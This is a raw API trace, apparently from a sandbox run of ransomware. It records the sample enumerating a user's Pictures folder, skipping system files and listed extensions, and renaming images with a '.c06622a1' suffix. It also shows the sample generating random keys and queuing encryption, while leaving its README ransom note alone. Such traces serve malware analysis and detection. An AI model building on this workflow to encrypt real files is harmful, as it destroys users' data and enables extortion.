[0155.764] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0155.764] wcslen (_String="cmd") returned 0x3 [0155.764] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0155.764] wcslen (_String="com") returned 0x3 [0155.764] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0155.764] wcslen (_String="cpl") returned 0x3 [0155.764] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0155.764] wcslen (_String="cur") returned 0x3 [0155.764] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0155.764] wcslen (_String="deskthemepack") returned 0xd [0155.764] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0155.764] wcslen (_String="diagcab") returned 0x7 [0155.765] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0155.765] wcslen (_String="diagcfg") returned 0x7 [0155.765] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0155.765] wcslen (_String="diagpkg") returned 0x7 [0155.765] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0155.765] wcslen (_String="dll") returned 0x3 [0155.765] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0155.765] wcslen (_String="drv") returned 0x3 [0155.765] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0155.765] wcslen (_String="exe") returned 0x3 [0155.765] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0155.765] wcslen (_String="hlp") returned 0x3 [0155.765] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0155.765] wcslen (_String="icl") returned 0x3 [0155.765] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0155.765] wcslen (_String="icns") returned 0x4 [0155.765] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0155.765] wcslen (_String="ico") returned 0x3 [0155.765] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0155.765] wcslen (_String="ics") returned 0x3 [0155.765] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0155.765] wcslen (_String="idx") returned 0x3 [0155.765] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0155.765] wcslen (_String="ldf") returned 0x3 [0155.765] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0155.765] wcslen (_String="lnk") returned 0x3 [0155.765] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0155.765] wcslen (_String="mod") returned 0x3 [0155.765] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0155.765] wcslen (_String="mpa") returned 0x3 [0155.765] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0155.765] wcslen (_String="msc") returned 0x3 [0155.765] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0155.765] wcslen (_String="msp") returned 0x3 [0155.766] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0155.766] wcslen (_String="msstyles") returned 0x8 [0155.766] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0155.766] wcslen (_String="msu") returned 0x3 [0155.766] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0155.766] wcslen (_String="nls") returned 0x3 [0155.766] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0155.766] wcslen (_String="nomedia") returned 0x7 [0155.766] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0155.766] wcslen (_String="ocx") returned 0x3 [0155.766] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0155.766] wcslen (_String="prf") returned 0x3 [0155.766] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0155.766] wcslen (_String="ps1") returned 0x3 [0155.766] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0155.766] wcslen (_String="rom") returned 0x3 [0155.766] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0155.766] wcslen (_String="rtp") returned 0x3 [0155.766] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0155.766] wcslen (_String="scr") returned 0x3 [0155.766] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0155.766] wcslen (_String="shs") returned 0x3 [0155.766] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0155.766] wcslen (_String="spl") returned 0x3 [0155.766] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0155.766] wcslen (_String="sys") returned 0x3 [0155.766] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0155.766] wcslen (_String="theme") returned 0x5 [0155.766] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0155.766] wcslen (_String="themepack") returned 0x9 [0155.766] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0155.766] wcslen (_String="wpx") returned 0x3 [0155.766] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0155.766] wcslen (_String="lock") returned 0x4 [0155.767] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0155.767] wcslen (_String="key") returned 0x3 [0155.767] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0155.767] wcslen (_String="hta") returned 0x3 [0155.767] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0155.767] wcslen (_String="msi") returned 0x3 [0155.767] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0155.767] wcslen (_String="pdb") returned 0x3 [0155.767] _wcsicmp (_Str1="sql", _Str2="png") returned 3 [0155.767] wcslen (_String="sql") returned 0x3 [0155.767] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0155.767] wcslen (_String="sqlite") returned 0x6 [0155.767] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf")) returned 0x10 [0155.767] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0155.767] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" [0155.767] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned 0x30 [0155.767] wcscpy (in: _Dest=0x45000f2, _Source="pZxmQYYyFLjb.png" | out: _Dest="pZxmQYYyFLjb.png") returned="pZxmQYYyFLjb.png" [0155.767] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\pZxmQYYyFLjb.png", dwFileAttributes=0x80) returned 1 [0155.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\pZxmQYYyFLjb.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\pzxmqyyyfljb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0155.768] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.768] ReadFile (in: hFile=0x640, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0155.768] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x2b7b7342 [0155.768] RtlComputeCrc32 (PartialCrc=0x7342, Buffer=0x3fe8f4, Length=0x80) returned 0x87caa90d [0155.768] RtlComputeCrc32 (PartialCrc=0xa90d, Buffer=0x3fe8f4, Length=0x80) returned 0x468d1ee0 [0155.768] RtlComputeCrc32 (PartialCrc=0x1ee0, Buffer=0x3fe8f4, Length=0x80) returned 0x3dd5ef2b [0155.768] RtlComputeCrc32 (PartialCrc=0xef2b, Buffer=0x3fe8f4, Length=0x80) returned 0x3312b228 [0155.769] CloseHandle (hObject=0x640) returned 1 [0155.769] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0155.769] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\pZxmQYYyFLjb.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\pZxmQYYyFLjb.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\pZxmQYYyFLjb.png" [0155.769] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\pZxmQYYyFLjb.png") returned 0x41 [0155.769] wcscpy (in: _Dest=0x451011a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.769] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\pZxmQYYyFLjb.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\pzxmqyyyfljb.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\pZxmQYYyFLjb.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\pzxmqyyyfljb.png.c06622a1"), dwFlags=0x8) returned 1 [0155.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\pZxmQYYyFLjb.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\pzxmqyyyfljb.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x640 [0155.772] CreateIoCompletionPort (FileHandle=0x640, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0155.772] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x48b0020 [0155.778] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x32c1fbd7 [0155.778] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6b9cfa6f [0155.778] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5e71115c [0155.778] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5bbb60dd [0155.778] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x40a54d7a [0155.778] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1ac7a433 [0155.778] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x48384f8 [0155.778] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x491760e1 [0155.782] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x48b0094, Length=0x80) returned 0x4e0e810d [0155.782] RtlComputeCrc32 (PartialCrc=0x810d, Buffer=0x48b0094, Length=0x80) returned 0x6c58f099 [0155.782] RtlComputeCrc32 (PartialCrc=0xf099, Buffer=0x48b0094, Length=0x80) returned 0x3f9e3439 [0155.782] RtlComputeCrc32 (PartialCrc=0x3439, Buffer=0x48b0094, Length=0x80) returned 0xf115d2d2 [0155.782] RtlComputeCrc32 (PartialCrc=0xd2d2, Buffer=0x48b0094, Length=0x80) returned 0xf0d901e8 [0155.782] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0155.782] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0155.782] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0155.782] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb494e20, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdb494e20, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdb494e20, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0155.782] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0155.782] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf14c2090, ftCreationTime.dwHighDateTime=0x1d5e437, ftLastAccessTime.dwLowDateTime=0x66a1ef80, ftLastAccessTime.dwHighDateTime=0x1d5e1b0, ftLastWriteTime.dwLowDateTime=0x66a1ef80, ftLastWriteTime.dwHighDateTime=0x1d5e1b0, nFileSizeHigh=0x0, nFileSizeLow=0x18c6d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rr8mx6wybDv.jpg", cAlternateFileName="RR8MX6~1.JPG")) returned 1 [0155.782] _wcsicmp (_Str1="Rr8mx6wybDv.jpg", _Str2="README.c06622a1.TXT") returned 13 [0155.782] wcsstr (_Str="Rr8mx6wybDv.jpg", _SubStr="README") returned 0x0 [0155.782] _wcsicmp (_Str1="autorun.inf", _Str2="Rr8mx6wybDv.jpg") returned -17 [0155.782] wcslen (_String="autorun.inf") returned 0xb [0155.782] _wcsicmp (_Str1="boot.ini", _Str2="Rr8mx6wybDv.jpg") returned -16 [0155.782] wcslen (_String="boot.ini") returned 0x8 [0155.782] _wcsicmp (_Str1="bootfont.bin", _Str2="Rr8mx6wybDv.jpg") returned -16 [0155.782] wcslen (_String="bootfont.bin") returned 0xc [0155.782] _wcsicmp (_Str1="bootsect.bak", _Str2="Rr8mx6wybDv.jpg") returned -16 [0155.782] wcslen (_String="bootsect.bak") returned 0xc [0155.783] _wcsicmp (_Str1="desktop.ini", _Str2="Rr8mx6wybDv.jpg") returned -14 [0155.783] wcslen (_String="desktop.ini") returned 0xb [0155.783] _wcsicmp (_Str1="iconcache.db", _Str2="Rr8mx6wybDv.jpg") returned -9 [0155.783] wcslen (_String="iconcache.db") returned 0xc [0155.783] _wcsicmp (_Str1="ntldr", _Str2="Rr8mx6wybDv.jpg") returned -4 [0155.783] wcslen (_String="ntldr") returned 0x5 [0155.783] _wcsicmp (_Str1="ntuser.dat", _Str2="Rr8mx6wybDv.jpg") returned -4 [0155.783] wcslen (_String="ntuser.dat") returned 0xa [0155.783] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Rr8mx6wybDv.jpg") returned -4 [0155.783] wcslen (_String="ntuser.dat.log") returned 0xe [0155.783] _wcsicmp (_Str1="ntuser.ini", _Str2="Rr8mx6wybDv.jpg") returned -4 [0155.783] wcslen (_String="ntuser.ini") returned 0xa [0155.783] _wcsicmp (_Str1="thumbs.db", _Str2="Rr8mx6wybDv.jpg") returned 2 [0155.783] wcslen (_String="thumbs.db") returned 0x9 [0155.783] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0155.783] wcslen (_String="386") returned 0x3 [0155.783] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0155.783] wcslen (_String="adv") returned 0x3 [0155.783] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0155.783] wcslen (_String="ani") returned 0x3 [0155.783] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0155.783] wcslen (_String="bat") returned 0x3 [0155.783] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0155.783] wcslen (_String="bin") returned 0x3 [0155.783] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0155.783] wcslen (_String="cab") returned 0x3 [0155.783] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0155.783] wcslen (_String="cmd") returned 0x3 [0155.783] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0155.783] wcslen (_String="com") returned 0x3 [0155.783] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0155.783] wcslen (_String="cpl") returned 0x3 [0155.783] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0155.783] wcslen (_String="cur") returned 0x3 [0155.784] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0155.784] wcslen (_String="deskthemepack") returned 0xd [0155.784] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0155.784] wcslen (_String="diagcab") returned 0x7 [0155.784] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0155.784] wcslen (_String="diagcfg") returned 0x7 [0155.784] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0155.784] wcslen (_String="diagpkg") returned 0x7 [0155.784] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0155.784] wcslen (_String="dll") returned 0x3 [0155.784] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0155.784] wcslen (_String="drv") returned 0x3 [0155.784] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0155.784] wcslen (_String="exe") returned 0x3 [0155.784] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0155.784] wcslen (_String="hlp") returned 0x3 [0155.784] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0155.784] wcslen (_String="icl") returned 0x3 [0155.784] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0155.784] wcslen (_String="icns") returned 0x4 [0155.784] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0155.784] wcslen (_String="ico") returned 0x3 [0155.784] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0155.784] wcslen (_String="ics") returned 0x3 [0155.784] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0155.784] wcslen (_String="idx") returned 0x3 [0155.784] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0155.784] wcslen (_String="ldf") returned 0x3 [0155.784] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0155.784] wcslen (_String="lnk") returned 0x3 [0155.784] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0155.784] wcslen (_String="mod") returned 0x3 [0155.784] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0155.785] wcslen (_String="mpa") returned 0x3 [0155.785] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0155.785] wcslen (_String="msc") returned 0x3 [0155.785] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0155.785] wcslen (_String="msp") returned 0x3 [0155.785] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0155.785] wcslen (_String="msstyles") returned 0x8 [0155.785] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0155.785] wcslen (_String="msu") returned 0x3 [0155.785] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0155.785] wcslen (_String="nls") returned 0x3 [0155.785] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0155.785] wcslen (_String="nomedia") returned 0x7 [0155.785] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0155.785] wcslen (_String="ocx") returned 0x3 [0155.785] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0155.785] wcslen (_String="prf") returned 0x3 [0155.785] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0155.785] wcslen (_String="ps1") returned 0x3 [0155.785] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0155.785] wcslen (_String="rom") returned 0x3 [0155.785] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0155.785] wcslen (_String="rtp") returned 0x3 [0155.785] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0155.785] wcslen (_String="scr") returned 0x3 [0155.785] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0155.785] wcslen (_String="shs") returned 0x3 [0155.785] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0155.785] wcslen (_String="spl") returned 0x3 [0155.785] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0155.785] wcslen (_String="sys") returned 0x3 [0155.785] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0155.785] wcslen (_String="theme") returned 0x5 [0155.785] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0155.785] wcslen (_String="themepack") returned 0x9 [0155.786] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0155.786] wcslen (_String="wpx") returned 0x3 [0155.786] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0155.786] wcslen (_String="lock") returned 0x4 [0155.786] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0155.786] wcslen (_String="key") returned 0x3 [0155.786] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0155.786] wcslen (_String="hta") returned 0x3 [0155.786] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0155.786] wcslen (_String="msi") returned 0x3 [0155.786] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0155.786] wcslen (_String="pdb") returned 0x3 [0155.786] _wcsicmp (_Str1="sql", _Str2="jpg") returned 9 [0155.786] wcslen (_String="sql") returned 0x3 [0155.786] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0155.786] wcslen (_String="sqlite") returned 0x6 [0155.786] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf")) returned 0x10 [0155.786] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0155.786] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" [0155.786] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned 0x30 [0155.786] wcscpy (in: _Dest=0x45000f2, _Source="Rr8mx6wybDv.jpg" | out: _Dest="Rr8mx6wybDv.jpg") returned="Rr8mx6wybDv.jpg" [0155.786] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\Rr8mx6wybDv.jpg", dwFileAttributes=0x80) returned 1 [0155.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\Rr8mx6wybDv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\rr8mx6wybdv.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0155.787] SetFilePointerEx (in: hFile=0x618, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.787] ReadFile (in: hFile=0x618, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0155.788] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x51a9f20e [0155.788] RtlComputeCrc32 (PartialCrc=0xf20e, Buffer=0x3fe8f4, Length=0x80) returned 0x954c11e5 [0155.788] RtlComputeCrc32 (PartialCrc=0x11e5, Buffer=0x3fe8f4, Length=0x80) returned 0x8bb56d1b [0155.788] RtlComputeCrc32 (PartialCrc=0x6d1b, Buffer=0x3fe8f4, Length=0x80) returned 0x46d6177e [0155.788] RtlComputeCrc32 (PartialCrc=0x177e, Buffer=0x3fe8f4, Length=0x80) returned 0x90dd98ec [0155.788] CloseHandle (hObject=0x618) returned 1 [0155.788] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0155.788] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\Rr8mx6wybDv.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\Rr8mx6wybDv.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\Rr8mx6wybDv.jpg" [0155.788] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\Rr8mx6wybDv.jpg") returned 0x40 [0155.788] wcscpy (in: _Dest=0x4510118, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.788] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\Rr8mx6wybDv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\rr8mx6wybdv.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\Rr8mx6wybDv.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\rr8mx6wybdv.jpg.c06622a1"), dwFlags=0x8) returned 1 [0155.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\Rr8mx6wybDv.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\rr8mx6wybdv.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x618 [0155.790] CreateIoCompletionPort (FileHandle=0x618, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.790] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4940020 [0155.796] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4725fa50 [0155.796] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x188c6610 [0155.796] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7a2a7d0d [0155.796] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3a50fcab [0155.796] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1686bbe7 [0155.796] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1d377092 [0155.796] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x690334c8 [0155.796] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6243db03 [0155.799] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4940094, Length=0x80) returned 0x33e59f72 [0155.799] RtlComputeCrc32 (PartialCrc=0x9f72, Buffer=0x4940094, Length=0x80) returned 0xc92ac4f4 [0155.799] RtlComputeCrc32 (PartialCrc=0xc4f4, Buffer=0x4940094, Length=0x80) returned 0x9e6e9187 [0155.799] RtlComputeCrc32 (PartialCrc=0x9187, Buffer=0x4940094, Length=0x80) returned 0xc2833be6 [0155.799] RtlComputeCrc32 (PartialCrc=0x3be6, Buffer=0x4940094, Length=0x80) returned 0x12c08c74 [0155.799] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0155.799] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0155.799] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0155.799] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa205a2a0, ftCreationTime.dwHighDateTime=0x1d5de3c, ftLastAccessTime.dwLowDateTime=0x4a643500, ftLastAccessTime.dwHighDateTime=0x1d5deac, ftLastWriteTime.dwLowDateTime=0x4a643500, ftLastWriteTime.dwHighDateTime=0x1d5deac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZLQWp8VVzu", cAlternateFileName="ZLQWP8~1")) returned 1 [0155.799] _wcsicmp (_Str1="$recycle.bin", _Str2="ZLQWp8VVzu") returned -86 [0155.799] wcslen (_String="$recycle.bin") returned 0xc [0155.799] _wcsicmp (_Str1="config.msi", _Str2="ZLQWp8VVzu") returned -23 [0155.799] wcslen 